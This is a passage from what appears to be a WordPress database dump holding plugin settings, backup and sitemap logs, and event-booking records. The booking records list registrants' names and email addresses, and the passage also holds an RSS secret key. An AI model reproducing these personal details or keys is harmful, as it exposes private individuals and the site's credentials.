50;s:10:\"started_at\";i:1699375950;s:12:\"completed_at\";i:1699376000;s:6:\"status\";s:4:\"done\";s:4:\"data\";a:0:{}}i:209;a:7:{s:2:\"id\";s:17:\"1699437605-9bb7ad\";s:4:\"type\";s:6:\"backup\";s:10:\"created_at\";i:1699437605;s:10:\"started_at\";i:1699437605;s:12:\"completed_at\";i:1699437687;s:6:\"status\";s:4:\"done\";s:4:\"data\";a:0:{}}i:210;a:7:{s:2:\"id\";s:17:\"1699466491-11d541\";s:4:\"type\";s:6:\"backup\";s:10:\"created_at\";i:1699466491;s:10:\"started_at\";i:1699466491;s:12:\"completed_at\";i:1699466564;s:6:\"status\";s:4:\"done\";s:4:\"data\";a:0:{}}i:211;a:7:{s:2:\"id\";s:17:\"1699493499-18a79a\";s:4:\"type\";s:6:\"backup\";s:10:\"created_at\";i:1699493499;s:10:\"started_at\";i:1699493499;s:12:\"completed_at\";i:1699493569;s:6:\"status\";s:4:\"done\";s:4:\"data\";a:0:{}}i:212;a:7:{s:2:\"id\";s:17:\"1699995562-33f20d\";s:4:\"type\";s:6:\"backup\";s:10:\"created_at\";i:1699995562;s:10:\"started_at\";i:1699995562;s:12:\"completed_at\";i:1699995657;s:6:\"status\";s:4:\"done\";s:4:\"data\";a:0:{}}i:213;a:7:{s:2:\"id\";s:17:\"1700042403-8798c4\";s:4:\"type\";s:6:\"backup\";s:10:\"created_at\";i:1700042403;s:10:\"started_at\";i:1700042403;s:12:\"completed_at\";i:1700042492;s:6:\"status\";s:4:\"done\";s:4:\"data\";a:0:{}}i:214;a:7:{s:2:\"id\";s:17:\"1700585383-cb0be9\";s:4:\"type\";s:6:\"backup\";s:10:\"created_at\";i:1700585383;s:10:\"started_at\";i:1700585383;s:12:\"completed_at\";N;s:6:\"status\";s:11:\"in_progress\";s:4:\"data\";a:0:{}}}','yes'),(5965385,'dismissed_review_notice','1656604931','yes'),(5970858,'updraft_lock_wpo_page_cache_preloader_creating_tasks','0','no'),(5970859,'updraft_lock_wpo_minify_preloader_creating_tasks','0','no'),(6014739,'click5_sitemap_first_load','','yes'),(6014741,'click5_sitemap_html_pagination_items_per_page','100','yes'),(6014749,'click5_sitemap_robots_exist','1','yes'),(6014755,'click5_sitemap_order_list_old','[{\"ID\":\"page\",\"order\":100,\"parent\":false},{\"ID\":\"266131\",\"order\":100,\"parent\":\"page\"},{\"ID\":\"7162\",\"order\":200,\"parent\":\"page\"},{\"ID\":\"264440\",\"order\":300,\"parent\":\"page\"},{\"ID\":\"265024\",\"order\":400,\"parent\":\"page\"},{\"ID\":\"261866\",\"order\":500,\"parent\":\"page\"},{\"ID\":\"264443\",\"order\":600,\"parent\":\"page\"},{\"ID\":\"264416\",\"order\":700,\"parent\":\"page\"},{\"ID\":\"7174\",\"order\":800,\"parent\":\"page\"},{\"ID\":\"7170\",\"order\":900,\"parent\":\"page\"},{\"ID\":\"266532\",\"order\":1000,\"parent\":\"page\"},{\"ID\":\"31882\",\"order\":1100,\"parent\":\"page\"},{\"ID\":\"45842\",\"order\":1200,\"parent\":\"page\"},{\"ID\":\"7160\",\"order\":1300,\"parent\":\"page\"},{\"ID\":\"32074\",\"order\":1400,\"parent\":\"page\"},{\"ID\":\"264446\",\"order\":1500,\"parent\":\"page\"},{\"ID\":\"264430\",\"order\":1600,\"parent\":\"page\"},{\"ID\":\"68102\",\"order\":1700,\"parent\":\"page\"},{\"ID\":\"264449\",\"order\":1800,\"parent\":\"page\"},{\"ID\":\"264437\",\"order\":1900,\"parent\":\"page\"},{\"ID\":\"32170\",\"order\":2000,\"parent\":\"page\"},{\"ID\":\"89020\",\"order\":2100,\"parent\":\"page\"},{\"ID\":\"181536\",\"order\":2200,\"parent\":\"page\"},{\"ID\":\"79666\",\"order\":2300,\"parent\":\"page\"},{\"ID\":\"71622\",\"order\":100,\"parent\":\"79666\"},{\"ID\":\"71767\",\"order\":200,\"parent\":\"79666\"},{\"ID\":\"71864\",\"order\":300,\"parent\":\"79666\"},{\"ID\":\"56319\",\"order\":400,\"parent\":\"79666\"},{\"ID\":\"33265\",\"order\":500,\"parent\":\"79666\"},{\"ID\":\"72053\",\"order\":600,\"parent\":\"79666\"},{\"ID\":\"56560\",\"order\":700,\"parent\":\"79666\"},{\"ID\":\"72150\",\"order\":800,\"parent\":\"79666\"},{\"ID\":\"72247\",\"order\":900,\"parent\":\"79666\"},{\"ID\":\"72344\",\"order\":1000,\"parent\":\"79666\"},{\"ID\":\"56657\",\"order\":1100,\"parent\":\"79666\"},{\"ID\":\"88712\",\"order\":1200,\"parent\":\"79666\"},{\"ID\":\"72441\",\"order\":1300,\"parent\":\"79666\"},{\"ID\":\"56851\",\"order\":1400,\"parent\":\"79666\"},{\"ID\":\"72538\",\"order\":1500,\"parent\":\"79666\"},{\"ID\":\"72635\",\"order\":1600,\"parent\":\"79666\"},{\"ID\":\"70845\",\"order\":1700,\"parent\":\"79666\"},{\"ID\":\"261549\",\"order\":1800,\"parent\":\"79666\"},{\"ID\":\"265598\",\"order\":1900,\"parent\":\"79666\"},{\"ID\":\"72732\",\"order\":2000,\"parent\":\"79666\"},{\"ID\":\"33457\",\"order\":2100,\"parent\":\"79666\"},{\"ID\":\"33553\",\"order\":2200,\"parent\":\"79666\"},{\"ID\":\"70278\",\"order\":2300,\"parent\":\"79666\"},{\"ID\":\"33361\",\"order\":2400,\"parent\":\"79666\"},{\"ID\":\"7172\",\"order\":2400,\"parent\":\"page\"},{\"ID\":\"266341\",\"order\":2500,\"parent\":\"page\"},{\"ID\":\"261533\",\"order\":2600,\"parent\":\"page\"},{\"ID\":\"263883\",\"order\":2700,\"parent\":\"page\"},{\"ID\":\"265745\",\"order\":2800,\"parent\":\"page\"},{\"ID\":\"266277\",\"order\":2900,\"parent\":\"page\"},{\"ID\":\"151053\",\"order\":3000,\"parent\":\"page\"}]','yes'),(6014761,'click5_sitemap_custom_name_text_cat_tax','','yes'),(6014762,'click5_sitemap_custom_name_text_authors_tax','','yes'),(6014763,'click5_sitemap_custom_name_text_tag_tax','','yes'),(6014764,'click5_sitemap_custom_name_text_mec_category','','yes'),(6014765,'click5_sitemap_custom_name_text_bg_block_type','','yes'),(6014767,'click5_sitemap_html_blog_group_by','disabled','yes'),(6014775,'click5_sitemap_create_robots_txt','','yes'),(6014785,'click5_sitemap_seo_sitemap_xml','1','yes'),(6014801,'google_ping_root','success https://eckankar-colorado.org/sitemap-index.xml','yes'),(6014803,'google_ping_post_sitemap-page.xml','success https://eckankar-colorado.org/sitemap-page.xml','yes'),(6016315,'click5_sitemap_delete_robot','','yes'),(6017197,'wpXSG_databaseUpgraded','1','no'),(6017198,'xmsg_Update','4','yes'),(6017199,'wpXSG_MapId','625f6b2279f3b7.47398513','yes'),(6017200,'xmsg_LastPing','0','yes'),(6017240,'wpXSG_global','O:34:\"xmlSitemapGenerator\\globalSettings\":15:{s:12:\"enableImages\";i:0;s:12:\"addRssToHead\";i:0;s:11:\"pingSitemap\";s:1:\"1\";s:11:\"addToRobots\";s:1:\"1\";s:9:\"sendStats\";i:0;s:11:\"smallCredit\";i:0;s:13:\"registerEmail\";s:0:\"\";s:8:\"register\";i:0;s:13:\"urlXmlSitemap\";s:14:\"xmlsitemap.xml\";s:14:\"urlNewsSitemap\";s:15:\"newssitemap.xml\";s:13:\"urlRssSitemap\";s:14:\"rsssitemap.xml\";s:12:\"urlRssLatest\";s:13:\"rsslatest.xml\";s:14:\"urlHtmlSitemap\";s:15:\"htmlsitemap.htm\";s:8:\"newsMode\";s:1:\"0\";s:12:\"robotEntries\";s:0:\"\";}','yes'),(6017241,'wpXSG_registered','0','yes'),(6017242,'wpXSG_sitemapDefaults','O:35:\"xmlSitemapGenerator\\sitemapDefaults\":16:{s:8:\"homepage\";O:32:\"xmlSitemapGenerator\\metaSettings\":9:{s:2:\"id\";i:0;s:6:\"itemId\";i:0;s:8:\"itemType\";s:0:\"\";s:7:\"exclude\";s:1:\"3\";s:8:\"priority\";s:2:\"12\";s:9:\"frequency\";s:1:\"6\";s:7:\"inherit\";i:0;s:9:\"scheduled\";i:0;s:4:\"news\";i:0;}s:5:\"pages\";O:32:\"xmlSitemapGenerator\\metaSettings\":9:{s:2:\"id\";i:0;s:6:\"itemId\";i:0;s:8:\"itemType\";s:0:\"\";s:7:\"exclude\";s:1:\"3\";s:8:\"priority\";s:1:\"8\";s:9:\"frequency\";s:1:\"4\";s:7:\"inherit\";i:0;s:9:\"scheduled\";i:0;s:4:\"news\";i:0;}s:5:\"posts\";O:32:\"xmlSitemapGenerator\\metaSettings\":9:{s:2:\"id\";i:0;s:6:\"itemId\";i:0;s:8:\"itemType\";s:0:\"\";s:7:\"exclude\";s:1:\"2\";s:8:\"priority\";s:1:\"8\";s:9:\"frequency\";s:1:\"4\";s:7:\"inherit\";i:0;s:9:\"scheduled\";i:0;s:4:\"news\";i:0;}s:18:\"taxonomyCategories\";O:32:\"xmlSitemapGenerator\\metaSettings\":9:{s:2:\"id\";i:0;s:6:\"itemId\";i:0;s:8:\"itemType\";s:0:\"\";s:7:\"exclude\";s:1:\"2\";s:8:\"priority\";s:1:\"5\";s:9:\"frequency\";s:1:\"5\";s:7:\"inherit\";i:0;s:9:\"scheduled\";i:0;s:4:\"news\";i:0;}s:12:\"taxonomyTags\";O:32:\"xmlSitemapGenerator\\metaSettings\":9:{s:2:\"id\";i:0;s:6:\"itemId\";i:0;s:8:\"itemType\";s:0:\"\";s:7:\"exclude\";s:1:\"2\";s:8:\"priority\";s:1:\"5\";s:9:\"frequency\";s:1:\"5\";s:7:\"inherit\";i:0;s:9:\"scheduled\";i:0;s:4:\"news\";i:0;}s:13:\"recentArchive\";O:32:\"xmlSitemapGenerator\\metaSettings\":9:{s:2:\"id\";i:0;s:6:\"itemId\";i:0;s:8:\"itemType\";s:0:\"\";s:7:\"exclude\";s:1:\"2\";s:8:\"priority\";s:1:\"8\";s:9:\"frequency\";s:1:\"7\";s:7:\"inherit\";i:0;s:9:\"scheduled\";i:0;s:4:\"news\";i:0;}s:10:\"oldArchive\";O:32:\"xmlSitemapGenerator\\metaSettings\":9:{s:2:\"id\";i:0;s:6:\"itemId\";i:0;s:8:\"itemType\";s:0:\"\";s:7:\"exclude\";s:1:\"2\";s:8:\"priority\";s:1:\"5\";s:9:\"frequency\";s:1:\"3\";s:7:\"inherit\";i:0;s:9:\"scheduled\";i:0;s:4:\"news\";i:0;}s:7:\"authors\";O:32:\"xmlSitemapGenerator\\metaSettings\":9:{s:2:\"id\";i:0;s:6:\"itemId\";i:0;s:8:\"itemType\";s:0:\"\";s:7:\"exclude\";s:1:\"2\";s:8:\"priority\";s:1:\"5\";s:9:\"frequency\";s:1:\"5\";s:7:\"inherit\";i:0;s:9:\"scheduled\";i:0;s:4:\"news\";i:0;}s:9:\"dateField\";s:7:\"updated\";s:12:\"excludeRules\";s:0:\"\";s:11:\"customPosts\";a:0:{}s:14:\"bg_attribution\";O:32:\"xmlSitemapGenerator\\metaSettings\":9:{s:2:\"id\";i:0;s:6:\"itemId\";i:0;s:8:\"itemType\";s:0:\"\";s:7:\"exclude\";s:1:\"2\";s:8:\"priority\";s:1:\"8\";s:9:\"frequency\";s:1:\"4\";s:7:\"inherit\";i:0;s:9:\"scheduled\";i:0;s:4:\"news\";i:0;}s:10:\"mec-events\";O:32:\"xmlSitemapGenerator\\metaSettings\":9:{s:2:\"id\";i:0;s:6:\"itemId\";i:0;s:8:\"itemType\";s:0:\"\";s:7:\"exclude\";s:1:\"2\";s:8:\"priority\";s:1:\"8\";s:9:\"frequency\";s:1:\"4\";s:7:\"inherit\";i:0;s:9:\"scheduled\";i:0;s:4:\"news\";i:0;}s:8:\"bg_block\";O:32:\"xmlSitemapGenerator\\metaSettings\":9:{s:2:\"id\";i:0;s:6:\"itemId\";i:0;s:8:\"itemType\";s:0:\"\";s:7:\"exclude\";s:1:\"2\";s:8:\"priority\";s:1:\"8\";s:9:\"frequency\";s:1:\"4\";s:7:\"inherit\";i:0;s:9:\"scheduled\";i:0;s:4:\"news\";i:0;}s:15:\"protected_areas\";O:32:\"xmlSitemapGenerator\\metaSettings\":9:{s:2:\"id\";i:0;s:6:\"itemId\";i:0;s:8:\"itemType\";s:0:\"\";s:7:\"exclude\";s:1:\"2\";s:8:\"priority\";s:1:\"8\";s:9:\"frequency\";s:1:\"4\";s:7:\"inherit\";i:0;s:9:\"scheduled\";i:0;s:4:\"news\";i:0;}s:12:\"popupbuilder\";O:32:\"xmlSitemapGenerator\\metaSettings\":9:{s:2:\"id\";i:0;s:6:\"itemId\";i:0;s:8:\"itemType\";s:0:\"\";s:7:\"exclude\";s:1:\"2\";s:8:\"priority\";s:1:\"8\";s:9:\"frequency\";s:1:\"4\";s:7:\"inherit\";i:0;s:9:\"scheduled\";i:0;s:4:\"news\";i:0;}}','no'),(6018074,'xmsg_Log','a:20:{i:0;s:76:\"Oct 24 2023 04:12:17 - <strong>Auto ping skipped. No modified posts</strong>\";i:1;s:76:\"Oct 23 2023 04:16:09 - <strong>Auto ping skipped. No modified posts</strong>\";i:2;s:76:\"Oct 22 2023 04:10:33 - <strong>Auto ping skipped. No modified posts</strong>\";i:3;s:76:\"Oct 21 2023 04:09:52 - <strong>Auto ping skipped. No modified posts</strong>\";i:4;s:57:\"Oct 20 2023 04:09:29 - <strong>Bing Auto ping - </strong>\";i:5;s:116:\"Oct 20 2023 04:09:29 - <strong>Google Auto ping - \nGoogle Webmaster Tools\n-\nSitemap Notification Received\n\n</strong>\";i:6;s:76:\"Oct 19 2023 04:08:49 - <strong>Auto ping skipped. No modified posts</strong>\";i:7;s:76:\"Oct 18 2023 04:12:37 - <strong>Auto ping skipped. No modified posts</strong>\";i:8;s:76:\"Oct 17 2023 04:08:44 - <strong>Auto ping skipped. No modified posts</strong>\";i:9;s:76:\"Oct 16 2023 04:14:24 - <strong>Auto ping skipped. No modified posts</strong>\";i:10;s:76:\"Oct 15 2023 04:10:09 - <strong>Auto ping skipped. No modified posts</strong>\";i:11;s:76:\"Oct 14 2023 04:18:14 - <strong>Auto ping skipped. No modified posts</strong>\";i:12;s:57:\"Oct 13 2023 04:08:59 - <strong>Bing Auto ping - </strong>\";i:13;s:116:\"Oct 13 2023 04:08:59 - <strong>Google Auto ping - \nGoogle Webmaster Tools\n-\nSitemap Notification Received\n\n</strong>\";i:14;s:57:\"Oct 12 2023 04:09:11 - <strong>Bing Auto ping - </strong>\";i:15;s:116:\"Oct 12 2023 04:09:11 - <strong>Google Auto ping - \nGoogle Webmaster Tools\n-\nSitemap Notification Received\n\n</strong>\";i:16;s:76:\"Oct 11 2023 04:19:36 - <strong>Auto ping skipped. No modified posts</strong>\";i:17;s:76:\"Oct 10 2023 04:11:58 - <strong>Auto ping skipped. No modified posts</strong>\";i:18;s:76:\"Oct 09 2023 04:09:32 - <strong>Auto ping skipped. No modified posts</strong>\";i:19;s:76:\"Oct 08 2023 04:11:51 - <strong>Auto ping skipped. No modified posts</strong>\";}','yes'),(6020436,'auto_update_themes','a:0:{}','yes'),(6020553,'wp-optimize-dismiss_notice','1679114447','yes'),(6035903,'simple_history_db_version','5','yes'),(6035904,'simple_history_show_as_page','1','yes'),(6035905,'simple_history_show_on_dashboard','','yes'),(6035906,'simple_history_enable_rss_feed','','yes'),(6035907,'simple_history_rss_secret','wlbvbtwpphijsjyzcywe','yes'),(6035909,'simplehistory_AvailableUpdatesLogger_plugin_updates_available','a:43:{s:31:\"popup-builder/popup-builder.php\";a:1:{s:15:\"checked_version\";s:6:\"4.1.14\";}s:66:\"remove-dashboard-access-for-non-admins/remove-dashboard-access.php\";a:1:{s:15:\"checked_version\";s:5:\"1.1.5\";}s:35:\"tabs-responsive/tabs-responsive.php\";a:1:{s:15:\"checked_version\";s:5:\"2.3.8\";}s:37:\"disable-comments/disable-comments.php\";a:1:{s:15:\"checked_version\";s:5:\"2.4.5\";}s:29:\"wp-mail-smtp/wp_mail_smtp.php\";a:1:{s:15:\"checked_version\";s:5:\"3.8.0\";}s:47:\"post-and-page-builder/post-and-page-builder.php\";a:1:{s:15:\"checked_version\";s:6:\"1.25.1\";}s:63:\"post-and-page-builder-premium/post-and-page-builder-premium.php\";a:1:{s:15:\"checked_version\";s:5:\"1.1.2\";}s:63:\"www-xml-sitemap-generator-org/www-xml-sitemap-generator-org.php\";a:1:{s:15:\"checked_version\";s:5:\"2.0.7\";}s:27:\"updraftplus/updraftplus.php\";a:1:{s:15:\"checked_version\";s:7:\"1.23.12\";}s:54:\"erident-custom-login-and-dashboard/er-custom-login.php\";a:1:{s:15:\"checked_version\";s:3:\"4.2\";}s:35:\"modula-best-grid-gallery/Modula.php\";a:1:{s:15:\"checked_version\";s:5:\"2.7.9\";}s:35:\"insert-headers-and-footers/ihaf.php\";a:1:{s:15:\"checked_version\";s:5:\"2.1.5\";}s:24:\"simple-history/index.php\";a:1:{s:15:\"checked_version\";s:5:\"4.7.2\";}s:35:\"wp-fastest-cache/wpFastestCache.php\";a:1:{s:15:\"checked_version\";s:5:\"1.2.2\";}s:31:\"code-snippets/code-snippets.php\";a:1:{s:15:\"checked_version\";s:5:\"3.6.2\";}s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";a:1:{s:15:\"checked_version\";s:5:\"7.1.3\";}s:30:\"protect-the-children/index.php\";a:1:{s:15:\"checked_version\";s:5:\"1.4.0\";}s:23:\"wordfence/wordfence.php\";a:1:{s:15:\"checked_version\";s:6:\"7.10.7\";}s:43:\"ga-google-analytics/ga-google-analytics.php\";a:1:{s:15:\"checked_version\";s:8:\"20231101\";}s:35:\"boldgrid-backup/boldgrid-backup.php\";a:1:{s:15:\"checked_version\";s:6:\"1.15.7\";}s:58:\"responsive-accordion-and-collapse/responsive-accordion.php\";a:1:{s:15:\"checked_version\";s:5:\"2.4.6\";}s:41:\"password-protected/password-protected.php\";a:1:{s:15:\"checked_version\";s:7:\"2.6.3.1\";}s:27:\"wp-optimize/wp-optimize.php\";a:1:{s:15:\"checked_version\";s:6:\"3.2.21\";}s:27:\"ninja-forms/ninja-forms.php\";a:1:{s:15:\"checked_version\";s:5:\"3.7.0\";}s:43:\"wp-maintenance-mode/wp-maintenance-mode.php\";a:1:{s:15:\"checked_version\";s:5:\"2.4.6\";}s:23:\"folders-pro/folders.php\";a:1:{s:15:\"checked_version\";s:5:\"2.9.9\";}s:33:\"duplicate-post/duplicate-post.php\";a:1:{s:15:\"checked_version\";s:3:\"4.5\";}s:27:\"autoptimize/autoptimize.php\";a:1:{s:15:\"checked_version\";s:6:\"3.1.10\";}s:47:\"boldgrid-inspirations/boldgrid-inspirations.php\";a:1:{s:15:\"checked_version\";s:5:\"2.7.4\";}s:39:\"content-protector/content-protector.php\";a:1:{s:15:\"checked_version\";s:5:\"4.2.6\";}s:51:\"simple-google-recaptcha/simple-google-recaptcha.php\";a:1:{s:15:\"checked_version\";s:3:\"4.0\";}s:39:\"simple-custom-css/simple-custom-css.php\";a:1:{s:15:\"checked_version\";s:5:\"4.0.6\";}s:55:\"advanced-google-recaptcha/advanced-google-recaptcha.php\";a:1:{s:15:\"checked_version\";s:4:\"1.14\";}s:19:\"404page/404page.php\";a:1:{s:15:\"checked_version\";s:6:\"11.4.4\";}s:42:\"scripts-to-footerphp/scripts-to-footer.php\";a:1:{s:15:\"checked_version\";s:5:\"0.7.1\";}s:39:\"boldgrid-easy-seo/boldgrid-easy-seo.php\";a:1:{s:15:\"checked_version\";s:6:\"1.6.13\";}s:37:\"tinymce-advanced/tinymce-advanced.php\";a:1:{s:15:\"checked_version\";s:5:\"5.9.2\";}s:27:\"redis-cache/redis-cache.php\";a:1:{s:15:\"checked_version\";s:5:\"2.5.0\";}s:45:\"remember-me-controls/remember-me-controls.php\";a:1:{s:15:\"checked_version\";s:5:\"2.0.1\";}s:30:\"modern-events-calendar/mec.php\";a:1:{s:15:\"checked_version\";s:5:\"7.3.0\";}s:41:\"mec-fluent-layouts/mec-fluent-layouts.php\";a:1:{s:15:\"checked_version\";s:5:\"1.5.0\";}s:25:\"fluentform/fluentform.php\";a:1:{s:15:\"checked_version\";s:5:\"5.1.2\";}s:25:\"wp-staging/wp-staging.php\";a:1:{s:15:\"checked_version\";s:5:\"3.1.3\";}}','yes'),(6035926,'simple_history_pager_size','10','yes'),(6035927,'simple_history_pager_size_dashboard','5','yes'),(6071609,'DGZ85409','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"teamskidmore@gmail.com\";s:4:\"name\";s:8:\"Shauncie\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1651401000:1651447800\";s:8:\"event_id\";s:6:\"266573\";s:19:\"translated_event_id\";s:6:\"266573\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266607;s:11:\"invoice_key\";s:32:\"82f0fecee10d9631084d4783af049239\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"teamskidmore@gmail.com\";s:4:\"name\";s:8:\"Shauncie\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6072954,'UXS95594','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"kellywinfo@gmail.com\";s:4:\"name\";s:13:\"Kelly Walker \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266608;s:11:\"invoice_key\";s:32:\"012c4c66423a30fb5b1b523be24e38f8\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"kellywinfo@gmail.com\";s:4:\"name\";s:13:\"Kelly Walker \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6073691,'PSA29618','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"mugarugaandrew@gmail.com\";s:4:\"name\";s:6:\"Andre \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1651401000:1651447800\";s:8:\"event_id\";s:6:\"266573\";s:19:\"translated_event_id\";s:6:\"266573\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266610;s:11:\"invoice_key\";s:32:\"55901bd9c5257c8ca56d8650fe551684\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"mugarugaandrew@gmail.com\";s:4:\"name\";s:6:\"Andre \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6081440,'BMU65375','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"sue2earth@msn.com\";s:4:\"name\";s:10:\"Sue Haebig\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266621;s:11:\"invoice_key\";s:32:\"ca45fbdd3707f2f27cea918f875ebafd\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"sue2earth@msn.com\";s:4:\"name\";s:10:\"Sue Haebig\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6083212,'temporary_logins_data','a:0:{}','yes'),(6083213,'tlwp_plugin_activation_time','1651527448','yes'),(6083214,'tlwp_plugin_version','1.7.2','yes'),(6091102,'XLS29928','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"class1coldwell@gmail.com\";s:4:\"name\";s:5:\"David\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266644;s:11:\"invoice_key\";s:32:\"561bf82a59434557928c21de60906c77\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"class1coldwell@gmail.com\";s:4:\"name\";s:5:\"David\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6102595,'JFL25285','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:25:\"jackiediane1109@gmail.com\";s:4:\"name\";s:25:\"Jacqueline Diane Roberts \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266654;s:11:\"invoice_key\";s:32:\"c13dd749fe620ddb742902743ab2d30f\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:25:\"jackiediane1109@gmail.com\";s:4:\"name\";s:25:\"Jacqueline Diane Roberts \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6111377,'NXZ69692','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266655;s:11:\"invoice_key\";s:32:\"521df7c7297f2f62de2c2160bd21a001\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave 